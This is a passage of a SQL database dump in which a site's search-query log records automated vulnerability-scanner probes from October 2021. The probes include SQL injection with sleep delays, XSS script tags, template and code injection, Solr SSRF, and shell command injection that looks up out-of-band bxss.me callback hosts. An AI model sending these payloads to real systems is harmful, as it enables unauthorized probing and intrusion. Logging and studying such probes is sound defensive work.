13:29:53'),(4764,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003692907500\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003692907500\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 13:34:23'),(4766,'aaa&shards=http://hitksdlnffwtraf297.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 13:34:26'),(4802,'xBNYHK9g',0,1,NULL,9,1,1,0,'2021-10-31 13:34:52'),(4816,'response.write(9026726*9215308)',0,1,NULL,9,1,1,0,'2021-10-31 13:35:01'),(4822,'\'+response.write(9026726*9215308)+\'',0,1,NULL,9,1,1,0,'2021-10-31 13:35:06'),(4828,'\"+response.write(9026726*9215308)+\"',0,1,NULL,9,1,1,0,'2021-10-31 13:35:10'),(4922,'echo irebom$()\\ ecorxk\\nz^xyu||a #\' &echo irebom$()\\ ecorxk\\nz^xyu||a #|\" &echo irebom$()\\ ecorxk\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 13:36:09'),(4924,'${9999006+9999222}',0,1,NULL,9,1,1,0,'2021-10-31 13:36:10'),(4934,'&echo ovqnhp$()\\ jjxsdl\\nz^xyu||a #\' &echo ovqnhp$()\\ jjxsdl\\nz^xyu||a #|\" &echo ovqnhp$()\\ jjxsdl\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 13:36:16'),(4942,'|echo hvjahx$()\\ ydxmeu\\nz^xyu||a #\' |echo hvjahx$()\\ ydxmeu\\nz^xyu||a #|\" |echo hvjahx$()\\ ydxmeu\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 13:36:22'),(4946,'(nslookup hitekyayiallc7b5e4.bxss.me||perl -e \"gethostbyname(\'hitekyayiallc7b5e4.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 13:36:25'),(4948,'thất&n904033=v920915',2,1,NULL,9,1,1,0,'2021-10-31 13:36:26'),(4952,'$(nslookup hitqoeefrteqe20abc.bxss.me||perl -e \"gethostbyname(\'hitqoeefrteqe20abc.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 13:36:29'),(4958,'&(nslookup hithoyantfuujb55ec.bxss.me||perl -e \"gethostbyname(\'hithoyantfuujb55ec.bxss.me\')\")&\'\\\"`0&(nslookup hithoyantfuujb55ec',0,1,NULL,9,1,1,0,'2021-10-31 13:36:34'),(4964,'|(nslookup hitizbwjjrqxs9e375.bxss.me||perl -e \"gethostbyname(\'hitizbwjjrqxs9e375.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 13:36:37'),(4972,'`(nslookup hittkobrnrduf0e2cb.bxss.me||perl -e \"gethostbyname(\'hittkobrnrduf0e2cb.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 13:36:43'),(4976,';(nslookup hitnbawojsxla16540.bxss.me||perl -e \"gethostbyname(\'hitnbawojsxla16540.bxss.me\')\")|(nslookup hitnbawojsxla16540.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 13:36:46'),(5015,'\'.gethostbyname(lc(\'hityz\'.\'rwincwgs07e5a.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(117).chr(84).chr(104).chr(87).\'',6,1,NULL,9,1,1,0,'2021-10-31 13:37:18'),(5021,'\".gethostbyname(lc(\"hitgz\".\"rzugmrsi0dfca.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(104).chr(85).chr(99).chr(69).\"',0,1,NULL,9,1,1,0,'2021-10-31 13:37:21'),(5085,'\"+\"A\".concat(70-3).concat(22*4).concat(118).concat(72).concat(104).concat(89)+(require\"socket\"\nSocket.gethostbyname(\"hitfb\"+\"jvc',0,1,NULL,9,1,1,0,'2021-10-31 13:37:59'),(5095,'\'+\'A\'.concat(70-3).concat(22*4).concat(102).concat(74).concat(101).concat(89)+(require\'socket\'\nSocket.gethostbyname(\'hitdd\'+\'gph',29,1,NULL,9,1,1,0,'2021-10-31 13:38:06'),(5234,'940733',0,1,NULL,9,1,1,0,'2021-10-31 13:39:39'),(5484,'thất\'\"()&%<acx><ScRiPt >NPZC(9405)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 13:46:21'),(5486,'\'\"()&%<acx><ScRiPt >NPZC(9309)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 13:46:23'),(5488,'thất9155113',0,1,NULL,9,1,1,0,'2021-10-31 13:46:25'),(5490,'thất9155113<',0,1,NULL,9,1,1,0,'2021-10-31 13:46:30'),(5494,'acu8097＜s1﹥s2ʺs3ʹuca8097',0,1,NULL,9,1,1,0,'2021-10-31 13:46:32'),(5496,'acux5005??z1??z2a?bcxuca5005',0,1,NULL,9,1,1,0,'2021-10-31 13:46:34'),(5520,'thất</title><ScRiPt >NPZC(9927)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 13:47:06'),(5636,'TMFiwltS',0,1,NULL,9,1,1,0,'2021-10-31 14:27:18'),(5638,'thất\' AND 2*3*8=6*8 AND \'VQLd\'=\'VQLd',37,1,NULL,9,1,1,0,'2021-10-31 14:27:22'),(5640,'thất\" AND 2*3*8=6*8 AND \"TDsu\"=\"TDsu',37,1,NULL,9,1,1,0,'2021-10-31 14:27:28'),(5642,'thất%\' AND 2*3*8=6*8 AND \'MEx9\'!=\'MEx9%',37,1,NULL,9,1,1,0,'2021-10-31 14:27:30'),(5644,'-1 OR 2+235-235-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 14:27:33'),(5646,'-1 OR 3+235-235-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 14:27:35'),(5648,'-1 OR 3*2<(0+5+235-235)',48,1,NULL,9,1,1,0,'2021-10-31 14:27:40'),(5650,'-1 OR 3*2>(0+5+235-235)',48,1,NULL,9,1,1,0,'2021-10-31 14:27:43'),(5664,'WowK8L6M\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 14:33:51'),(5666,'lcmRb3ul\' OR 651=(SELECT 651 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 14:34:41'),(5668,'L9I0T0np\') OR 829=(SELECT 829 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 14:35:41'),(5670,'gaRhyEIq\')) OR 898=(SELECT 898 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 14:36:42'),(5678,'@@ADvEa',0,1,NULL,9,1,1,0,'2021-10-31 14:37:44'),(5688,'1DZ7p4M0aAO',0,1,NULL,9,1,1,0,'2021-10-31 14:58:59'),(5720,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003698684146\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003698684146\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 15:04:38'),(5722,'aaa&shards=http://hitxzrrimeuvaeb1ff.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 15:04:40'),(5760,'response.write(9394558*9023389)',0,1,NULL,9,1,1,0,'2021-10-31 15:05:17'),(5764,'\'+response.write(9394558*9023389)+\'',0,1,NULL,9,1,1,0,'2021-10-31 15:05:20'),(5768,'\"+response.write(9394558*9023389)+\"',0,1,NULL,9,1,1,0,'2021-10-31 15:05:22'),(5784,'VsXAxZya',0,1,NULL,9,1,1,0,'2021-10-31 15:05:30'),(5854,'echo dyavzo$()\\ ckyfmq\\nz^xyu||a #\' &echo dyavzo$()\\ ckyfmq\\nz^xyu||a #|\" &echo dyavzo$()\\ ckyfmq\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 15:06:17'),(5860,'&echo ajeqdq$()\\ qyuavk\\nz^xyu||a #\' &echo ajeqdq$()\\ qyuavk\\nz^xyu||a #|\" &echo ajeqdq$()\\ qyuavk\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 15:06:20'),(5870,'|echo ovtjis$()\\ nhedgv\\nz^xyu||a #\' |echo ovtjis$()\\ nhedgv\\nz^xyu||a #|\" |echo ovtjis$()\\ nhedgv\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 15:06:24'),(5876,'(nslookup hitfzqgnkuvoj24aae.bxss.me||perl -e \"gethostbyname(\'hitfzqgnkuvoj24aae.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 15:06:26'),(5886,'$(nslookup hituuwcknfsta2f21b.bxss.me||perl -e \"gethostbyname(\'hituuwcknfsta2f21b.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 15:06:33'),(5890,'&(nslookup hitboyuokmyob80e7e.bxss.me||perl -e \"gethostbyname(\'hitboyuokmyob80e7e.bxss.me\')\")&\'\\\"`0&(nslookup hitboyuokmyob80e7e',0,1,NULL,9,1,1,0,'2021-10-31 15:06:35'),(5896,'${9999898+9999294}',0,1,NULL,9,1,1,0,'2021-10-31 15:06:39'),(5898,'|(nslookup hitwiuxajrmjz2a11c.bxss.me||perl -e \"gethostbyname(\'hitwiuxajrmjz2a11c.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 15:06:39'),(5904,'`(nslookup hitapiwyhgydbc6f45.bxss.me||perl -e \"gethostbyname(\'hitapiwyhgydbc6f45.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 15:06:43'),(5908,';(nslookup hitroauskrdhc921ae.bxss.me||perl -e \"gethostbyname(\'hitroauskrdhc921ae.bxss.me\')\")|(nslookup hitroauskrdhc921ae.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 15:06:47'),(5932,'thất&n971993=v995121',2,1,NULL,9,1,1,0,'2021-10-31 15:07:02'),(5969,'\'.gethostbyname(lc(\'hitjo\'.\'thjiowkje912d.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(117).chr(81).chr(98).chr(75).\'',12,1,NULL,9,1,1,0,'2021-10-31 15:07:31'),(5975,'\".gethostbyname(lc(\"hitcy\".\"xjdnownc647f1.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(101).chr(88).chr(103).chr(86).\"',0,1,NULL,9,1,1,0,'2021-10-31 15:07:34'),(6029,'\"+\"A\".concat(70-3).concat(22*4).concat(105).concat(76).concat(110).concat(71)+(require\"socket\"\nSocket.gethostbyname(\"hitkr\"+\"mub',0,1,NULL,9,1,1,0,'2021-10-31 15:07:59'),(6035,'\'+\'A\'.concat(70-3).concat(22*4).concat(120).concat(80).concat(115).concat(65)+(require\'socket\'\nSocket.gethostbyname(\'hitoj\'+\'tgd',32,1,NULL,9,1,1,0,'2021-10-31 15:08:03'),(6182,'911351',0,1,NULL,9,1,1,0,'2021-10-31 15:09:15'),(6464,'thất\'\"()&%<acx><ScRiPt >xxGG(9529)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 15:17:15'),(6466,'\'\"()&%<acx><ScRiPt >xxGG(9784)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 15:17:23'),(6470,'thất9826539',0,1,NULL,9,1,1,0,'2021-10-31 15:17:29'),(6472,'thất9826539<',0,1,NULL,9,1,1,0,'2021-10-31 15:17:35'),(6474,'acu8172＜s1﹥s2ʺs3ʹuca8172',0,1,NULL,9,1,1,0,'2021-10-31 15:17:43'),(6476,'acux9489??z1??z2a?bcxuca9489',0,1,NULL,9,1,1,0,'2021-10-31 15:17:52'),(6496,'thất</title><ScRiPt >xxGG(9854)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 15:18:51'),(6564,'KRIfXWSy',0,1,NULL,9,1,1,0,'2021-10-31 15:52:30'),(6566,'thất\' AND 2*3*8=6*8 AND \'PRwj\'=\'PRwj',37,1,NULL,9,1,1,0,'2021-10-31 15:52:33'),(6568,'thất\" AND 2*3*8=6*8 AND \"RdRu\"=\"RdRu',37,1,NULL,9,1,1,0,'2021-10-31 15:52:38'),(6570,'thất%\' AND 2*3*8=6*8 AND \'aAV9\'!=\'aAV9%',37,1,NULL,9,1,1,0,'2021-10-31 15:52:42'),(6572,'-1 OR 2+658-658-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 15:52:45'),(6574,'-1 OR 3+658-658-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 15:52:49'),(6576,'-1 OR 3*2<(0+5+658-658)',48,1,NULL,9,1,1,0,'2021-10-31 15:52:52'),(6578,'-1 OR 3*2>(0+5+658-658)',48,1,NULL,9,1,1,0,'2021-10-31 15:52:57'),(6590,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003698772561\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003698772561\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 15:55:53'),(6594,'aaa&shards=http://hitynkgodfgxeffc76.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 15:55:57'),(6604,'1CAaAI3tbiO',0,1,NULL,9,1,1,0,'2021-10-31 15:56:04'),(6630,'6b7nFmao',0,1,NULL,9,1,1,0,'2021-10-31 15:56:20'),(6656,'response.write(9538042*9647780)',0,1,NULL,9,1,1,0,'2021-10-31 15:56:35'),(6664,'\'+response.write(9538042*9647780)+\'',0,1,NULL,9,1,1,0,'2021-10-31 15:56:39'),(6674,'\"+response.write(9538042*9647780)+\"',0,1,NULL,9,1,1,0,'2021-10-31 15:56:45'),(6742,'${9999552+9999916}',0,1,NULL,9,1,1,0,'2021-10-31 15:57:21'),(6774,'thất&n991080=v900980',2,1,NULL,9,1,1,0,'2021-10-31 15:57:37'),(6792,'echo lunukn$()\\ woyrjd\\nz^xyu||a #\' &echo lunukn$()\\ woyrjd\\nz^xyu||a #|\" &echo lunukn$()\\ woyrjd\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 15:57:45'),(6800,'&echo gwhtsg$()\\ eykgnp\\nz^xyu||a #\' &echo gwhtsg$()\\ eykgnp\\nz^xyu||a #|\" &echo gwhtsg$()\\ eykgnp\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 15:57:48'),(6814,'|echo gyvokv$()\\ qlnoca\\nz^xyu||a #\' |echo gyvokv$()\\ qlnoca\\nz^xyu||a #|\" |echo gyvokv$()\\ qlnoca\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 15:57:53'),(6822,'(nslookup hittrnasmkbsh12a9b.bxss.me||perl -e \"gethostbyname(\'hittrnasmkbsh12a9b.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 15:57:57'),(6832,'$(nslookup hitvxzgttbwheb3367.bxss.me||perl -e \"gethostbyname(\'hitvxzgttbwheb3367.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 15:58:01'),(6834,'\'.gethostbyname(lc(\'hitci\'.\'yadeafmj3ef45.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(101).chr(82).chr(98).chr(71).\'',5,1,NULL,9,1,1,0,'2021-10-31 15:58:02'),(6842,'&(nslookup hiteaxuofjxog67996.bxss.me||perl -e \"gethostbyname(\'hiteaxuofjxog67996.bxss.me\')\")&\'\\\"`0&(nslookup hiteaxuofjxog67996',0,1,NULL,9,1,1,0,'2021-10-31 15:58:06'),(6848,'\".gethostbyname(lc(\"hitqm\".\"znkrkafh6aaa8.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(110).chr(77).chr(107).chr(70).\"',0,1,NULL,9,1,1,0,'2021-10-31 15:58:09'),(6854,'|(nslookup hitnexmlslcooc4aed.bxss.me||perl -e \"gethostbyname(\'hitnexmlslcooc4aed.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 15:58:11'),(6863,'`(nslookup hitxnluhgeolaa45b7.bxss.me||perl -e \"gethostbyname(\'hitxnluhgeolaa45b7.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 15:58:17'),(6873,';(nslookup hitxmhkwllurhd3991.bxss.me||perl -e \"gethostbyname(\'hitxmhkwllurhd3991.bxss.me\')\")|(nslookup hitxmhkwllurhd3991.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 15:58:22'),(6937,'\"+\"A\".concat(70-3).concat(22*4).concat(109).concat(68).concat(99).concat(69)+(require\"socket\"\nSocket.gethostbyname(\"hittb\"+\"eqzu',0,1,NULL,9,1,1,0,'2021-10-31 15:58:53'),(6951,'\'+\'A\'.concat(70-3).concat(22*4).concat(108).concat(76).concat(120).concat(67)+(require\'socket\'\nSocket.gethostbyname(\'hitfq\'+\'tux',32,1,NULL,9,1,1,0,'2021-10-31 15:58:59'),(7054,'900447',0,1,NULL,9,1,1,0,'2021-10-31 16:00:04'),(7062,'9PMq8Bb6\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 16:00:10'),(7122,'YD8eMfEv\' OR 619=(SELECT 619 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 16:01:37'),(7174,'syoAYrT4\') OR 181=(SELECT 181 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 16:03:18'),(7222,'xqY0eab6\')) OR 383=(SELECT 383 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 16:04:55'),(7278,'@@O1wYU',0,1,NULL,9,1,1,0,'2021-10-31 16:06:49'),(7336,'thất\'\"()&%<acx><ScRiPt >o4EP(9254)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 16:08:42'),(7338,'\'\"()&%<acx><ScRiPt >o4EP(9516)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 16:08:47'),(7340,'thất9610053',0,1,NULL,9,1,1,0,'2021-10-31 16:08:51'),(7342,'thất9610053<',0,1,NULL,9,1,1,0,'2021-10-31 16:08:54'),(7344,'acu3917＜s1﹥s2ʺs3ʹuca3917',0,1,NULL,9,1,1,0,'2021-10-31 16:08:59'),(7346,'acux8942??z1??z2a?bcxuca8942',0,1,NULL,9,1,1,0,'2021-10-31 16:09:04'),(7372,'thất</title><ScRiPt >o4EP(9250)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 16:09:56'),(7478,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003699290856\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003699290856\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 16:48:12'),(7480,'aaa&shards=http://hitehqnwfhgbqacce3.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 16:48:16'),(7494,'1Dmceqo2hVO',0,1,NULL,9,1,1,0,'2021-10-31 16:48:32'),(7516,'vjGveh9u',0,1,NULL,9,1,1,0,'2021-10-31 16:48:51'),(7538,'response.write(9737246*9146907)',0,1,NULL,9,1,1,0,'2021-10-31 16:49:09'),(7542,'\'+response.write(9737246*9146907)+\'',0,1,NULL,9,1,1,0,'2021-10-31 16:49:14'),(7548,'\"+response.write(9737246*9146907)+\"',0,1,NULL,9,1,1,0,'2021-10-31 16:49:19'),(7614,'${9999714+9999323}',0,1,NULL,9,1,1,0,'2021-10-31 16:50:08'),(7644,'thất&n959985=v952589',2,1,NULL,9,1,1,0,'2021-10-31 16:50:27'),(7690,'echo cqmmcv$()\\ gyznoh\\nz^xyu||a #\' &echo cqmmcv$()\\ gyznoh\\nz^xyu||a #|\" &echo cqmmcv$()\\ gyznoh\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 16:50:56'),(7696,'&echo ispdze$()\\ lmsxkk\\nz^xyu||a #\' &echo ispdze$()\\ lmsxkk\\nz^xyu||a #|\" &echo ispdze$()\\ lmsxkk\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 16:51:00'),(7704,'|echo mztlwl$()\\ lnbnok\\nz^xyu||a #\' |echo mztlwl$()\\ lnbnok\\nz^xyu||a #|\" |echo mztlwl$()\\ lnbnok\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 16:51:06'),(7714,'(nslookup hitbyzlrqacrr65887.bxss.me||perl -e \"gethostbyname(\'hitbyzlrqacrr65887.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 16:51:11'),(7720,'\'.gethostbyname(lc(\'hitaj\'.\'rmlowgykd4ca0.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(121).chr(66).chr(122).chr(86).\'',3,1,NULL,9,1,1,0,'2021-10-31 16:51:16'),(7722,'$(nslookup hitznpoyezqond21f7.bxss.me||perl -e \"gethostbyname(\'hitznpoyezqond21f7.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 16:51:18'),(7725,'\".gethostbyname(lc(\"hitjt\".\"nsnttvkm21e9b.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(98).chr(78).chr(98).chr(87).\"',0,1,NULL,9,1,1,0,'2021-10-31 16:51:22'),(7733,'&(nslookup hituaiwjdqszx7a32e.bxss.me||perl -e \"gethostbyname(\'hituaiwjdqszx7a32e.bxss.me\')\")&\'\\\"`0&(nslookup hituaiwjdqszx7a32e',0,1,NULL,9,1,1,0,'2021-10-31 16:51:25'),(7739,'|(nslookup hitwzswloretfb2353.bxss.me||perl -e \"gethostbyname(\'hitwzswloretfb2353.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 16:51:31'),(7751,'`(nslookup hitffwzchupnge4b99.bxss.me||perl -e \"gethostbyname(\'hitffwzchupnge4b99.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 16:51:41'),(7759,';(nslookup hitmbnatsueykc6352.bxss.me||perl -e \"gethostbyname(\'hitmbnatsueykc6352.bxss.me\')\")|(nslookup hitmbnatsueykc6352.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 16:51:46'),(7839,'\"+\"A\".concat(70-3).concat(22*4).concat(104).concat(77).concat(105).concat(73)+(require\"socket\"\nSocket.gethostbyname(\"hitby\"+\"htj',0,1,NULL,9,1,1,0,'2021-10-31 16:52:36'),(7849,'\'+\'A\'.concat(70-3).concat(22*4).concat(99).concat(75).concat(121).concat(87)+(require\'socket\'\nSocket.gethostbyname(\'hithw\'+\'wbgg',31,1,NULL,9,1,1,0,'2021-10-31 16:52:40'),(7950,'936711',0,1,NULL,9,1,1,0,'2021-10-31 16:53:43'),(8224,'thất\'\"()&%<acx><ScRiPt >jgWN(9044)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 17:01:13'),(8228,'\'\"()&%<acx><ScRiPt >jgWN(9003)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 17:01:18'),(8230,'thất9860668',0,1,NULL,9,1,1,0,'2021-10-31 17:01:22'),(8232,'thất9860668<',0,1,NULL,9,1,1,0,'2021-10-31 17:01:25'),(8234,'acu2525＜s1﹥s2ʺs3ʹuca2525',0,1,NULL,9,1,1,0,'2021-10-31 17:01:30'),(8236,'acux1614??z1??z2a?bcxuca1614',0,1,NULL,9,1,1,0,'2021-10-31 17:01:32'),(8258,'thất</title><ScRiPt >jgWN(9710)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 17:02:14'),(8264,'88F7DNCX',0,1,NULL,9,1,1,0,'2021-10-31 17:04:25'),(8266,'thất\' AND 2*3*8=6*8 AND \'5nWp\'=\'5nWp',37,1,NULL,9,1,1,0,'2021-10-31 17:04:32'),(8268,'thất\" AND 2*3*8=6*8 AND \"pnvf\"=\"pnvf',37,1,NULL,9,1,1,0,'2021-10-31 17:04:35'),(8270,'thất%\' AND 2*3*8=6*8 AND \'iWbn\'!=\'iWbn%',37,1,NULL,9,1,1,0,'2021-10-31 17:04:39'),(8272,'-1 OR 2+898-898-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 17:04:43'),(8274,'-1 OR 3+898-898-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 17:04:46'),(8276,'-1 OR 3*2<(0+5+898-898)',48,1,NULL,9,1,1,0,'2021-10-31 17:04:50'),(8278,'-1 OR 3*2>(0+5+898-898)',48,1,NULL,9,1,1,0,'2021-10-31 17:04:55'),(8304,'zXvm8eET\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 17:11:30'),(8308,'cV4QLPpy\' OR 569=(SELECT 569 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 17:12:42'),(8312,'pUby0zHb\') OR 108=(SELECT 108 FROM PG_SLEEP(15))--',3,1,NULL,9,1,1,0,'2021-10-31 17:14:27'),(8322,'XKqqzpRt\')) OR 178=(SELECT 178 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 17:15:53'),(8332,'@@YGrUK',0,1,NULL,9,1,1,0,'2021-10-31 17:17:12'),(8422,'MN3fHLcJ',0,1,NULL,9,1,1,0,'2021-10-31 17:55:48'),(8424,'thất\' AND 2*3*8=6*8 AND \'JI3R\'=\'JI3R',37,1,NULL,9,1,1,0,'2021-10-31 17:55:52'),(8426,'thất\" AND 2*3*8=6*8 AND \"XPvl\"=\"XPvl',37,1,NULL,9,1,1,0,'2021-10-31 17:55:56'),(8428,'thất%\' AND 2*3*8=6*8 AND \'vin9\'!=\'vin9%',37,1,NULL,9,1,1,0,'2021-10-31 17:56:04'),(8430,'-1 OR 2+163-163-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 17:56:08'),(8432,'-1 OR 3+163-163-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 17:56:14'),(8434,'-1 OR 3*2<(0+5+163-163)',48,1,NULL,9,1,1,0,'2021-10-31 17:56:18'),(8436,'-1 OR 3*2>(0+5+163-163)',48,1,NULL,9,1,1,0,'2021-10-31 17:56:21'),(8450,'k7GJgst3\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 18:03:16'),(8452,'hKxeSaUV\' OR 206=(SELECT 206 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 18:04:27'),(8456,'uB9h6OLU\') OR 780=(SELECT 780 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 18:05:57'),(8458,'63n6VrQk\')) OR 597=(SELECT 597 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 18:07:15'),(8466,'@@EWCJY',0,1,NULL,9,1,1,0,'2021-10-31 18:08:24'),(8470,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003694705967\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003694705967\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 18:12:54'),(8472,'aaa&shards=http://hitvwjovhndyjd10a7.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 18:12:56'),(8478,'1XrqVZozYO',0,1,NULL,9,1,1,0,'2021-10-31 18:13:00'),(8492,'response.write(9081643*9766597)',0,1,NULL,9,1,1,0,'2021-10-31 18:13:14'),(8494,'\'+response.write(9081643*9766597)+\'',0,1,NULL,9,1,1,0,'2021-10-31 18:13:16'),(8496,'\"+response.write(9081643*9766597)+\"',0,1,NULL,9,1,1,0,'2021-10-31 18:13:18'),(8536,'echo zwenyl$()\\ arcifs\\nz^xyu||a #\' &echo zwenyl$()\\ arcifs\\nz^xyu||a #|\" &echo zwenyl$()\\ arcifs\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 18:13:53'),(8538,'&echo azofnc$()\\ qjzbrl\\nz^xyu||a #\' &echo azofnc$()\\ qjzbrl\\nz^xyu||a #|\" &echo azofnc$()\\ qjzbrl\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 18:13:54'),(8540,'|echo myzulm$()\\ yvjpvk\\nz^xyu||a #\' |echo myzulm$()\\ yvjpvk\\nz^xyu||a #|\" |echo myzulm$()\\ yvjpvk\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 18:13:56'),(8542,'(nslookup hitxdhlfnsibhf4605.bxss.me||perl -e \"gethostbyname(\'hitxdhlfnsibhf4605.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 18:13:57'),(8544,'$(nslookup hitkwydbqtixx170fe.bxss.me||perl -e \"gethostbyname(\'hitkwydbqtixx170fe.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 18:13:59'),(8546,'&(nslookup hitftyfjwlerm48272.bxss.me||perl -e \"gethostbyname(\'hitftyfjwlerm48272.bxss.me\')\")&\'\\\"`0&(nslookup hitftyfjwlerm48272',0,1,NULL,9,1,1,0,'2021-10-31 18:14:01'),(8548,'|(nslookup hitwreqwdzjcqb4317.bxss.me||perl -e \"gethostbyname(\'hitwreqwdzjcqb4317.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 18:14:04'),(8550,'`(nslookup hitdlihthetpy10156.bxss.me||perl -e \"gethostbyname(\'hitdlihthetpy10156.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 18:14:06'),(8552,';(nslookup hitsnptrqdpvz4cae7.bxss.me||perl -e \"gethostbyname(\'hitsnptrqdpvz4cae7.bxss.me\')\")|(nslookup hitsnptrqdpvz4cae7.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 18:14:08'),(8558,'dn5E0Zqo',0,1,NULL,9,1,1,0,'2021-10-31 18:14:15'),(8618,'${10000425+9999008}',0,1,NULL,9,1,1,0,'2021-10-31 18:14:50'),(8628,'thất&n956545=v945907',2,1,NULL,9,1,1,0,'2021-10-31 